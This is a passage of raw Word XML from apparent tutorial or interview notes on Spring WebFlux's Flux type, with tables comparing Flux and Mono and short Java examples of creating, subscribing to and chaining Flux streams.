          <w:p w14:paraId="68C972C3" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flux Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1344958F" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3EBF6942" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75CA3B30"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Flux&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4D9E51"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A stream of String values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1E5C5C27" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5035EF07"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Flux&lt;User&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401FC885"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A list/stream of User objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="05FB063F" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584802BB"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Flux&lt;Void&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9DB379"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Only completion signal or error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A2B57D6" w14:textId="77777777" w:rsidR="002951F8"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60BACEE">
          <v:rect id="_x0000_i2243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD56204" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E12EA"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Flux&lt;String&gt; names = Flux.just("Alice", "Bob", "Charlie");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C85E39" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D3618F"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Flux&lt;Integer&gt; range = Flux.range(1, 5); // emits 1 to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55529546" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C356EAD"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Flux&lt;Object&gt; emptyFlux = Flux.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3D14C" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0FA0C"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Flux&lt;Object&gt; errorFlux = Flux.error(new RuntimeException("Something went wrong"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE562FF" w14:textId="77777777" w:rsidR="002951F8"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8F5E029">
          <v:rect id="_x0000_i2244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1392CD" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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Flux vs Mon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0"/>
        <w:gridCol w:w="1456"/>
        <w:gridCol w:w="2382"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="05AFB9B3" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FF384DD" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3CC338" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mono</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1219DFE9" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="07FE430A" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4173C984"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Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12069D5B"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0 or 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22CF5BB7"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0 to N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="2D3EAE9C" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="405E9C04"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089426F0"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Single response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A684BA"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Multiple/streamed values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6BF29652" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58BD64BF"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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CED790"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Single user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E30A9E5"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List of users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21CAC197"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5C968C6">
          <v:rect id="_x0000_i2245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7187E2" w14:textId="10F3782C"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491" w:name="_Toc196307971"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Flux works</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w14:paraId="59817A51" w14:textId="598D541C" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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How Flux Works in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E50FD"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Flux is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specification that emits </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0 to N elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronously and non-blockingly</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB5D267" w14:textId="77777777" w:rsidR="002951F8"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605DF8A">
          <v:rect id="_x0000_i2246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="365580C0" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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1. Flux Emits Data Over Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09391C98"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Think of Flux like a stream — it pushes data as it's available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0ABAB3"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It’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pull-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the beginning (requesting data) and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when emitting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A949CF" w14:textId="77777777" w:rsidR="002951F8"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A5D929E">
          <v:rect id="_x0000_i2247" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E814984" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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2. Creation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE1317"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Flux&lt;String&gt; names = Flux.just("A", "B", "C");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F0D6E"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This emits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01931805"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A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D3BB5"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B"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB83199"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C"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E538B51"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then completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36146D9E" w14:textId="77777777" w:rsidR="002951F8"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2CE76F0">
          <v:rect id="_x0000_i2248" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE17A8" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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3. Flux Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E74AD"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Subscribe</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need a subscriber to consume the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEF939"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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Subscriber requests N items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBDA85"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Emit</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flux emits elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AFFDA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Complete/Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Emits completion signal or error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16185F" w14:textId="77777777" w:rsidR="002951F8"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05B5B03B">
          <v:rect id="_x0000_i2249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1EDF9" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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4. Subscription Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C032DCB"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names.subscribe(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31009166"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    data -&gt; System.out.println("Received: " + data),         // onNext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6C8EC"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    err -&gt; System.err.println("Error: " + err),               // onError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E701E4"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    () -&gt; System.out.println("Stream Completed")              // onComplete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404060EB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2F017" w14:textId="77777777" w:rsidR="002951F8"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6366F26">
          <v:rect id="_x0000_i2250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751583B" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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5. Operators Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B299EA"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You can chain operators like map, filter, flatMap, take, etc.:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC77A14"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Flux.range(1, 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA32377"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    .filter(i -&gt; i % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9449AC"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    .map(i -&gt; "Even: " + i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB233A"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    .subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E33672" w14:textId="77777777" w:rsidR="002951F8"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152C2A0">
          <v:rect id="_x0000_i2251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC8D1B" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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6. WebFlux Controller Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE088C"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GetMapping("/numbers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A9E21"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public Flux&lt;Integer&gt; getNumbers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E12576"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 xml:space="preserve">    return Flux.range(1, 5);  // emits 1 to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08671908"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7637F071" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="00000000" w:rsidP="0037257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F0121FC">
          <v:rect id="_x0000_i2252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B100327" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055E2C9"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Emits 0-N values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9F6E9"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Asynchronous and non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB223D5"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Useful for streaming and reactive data handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60157E64"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Works well with backpressure and reactive pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E9E44" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
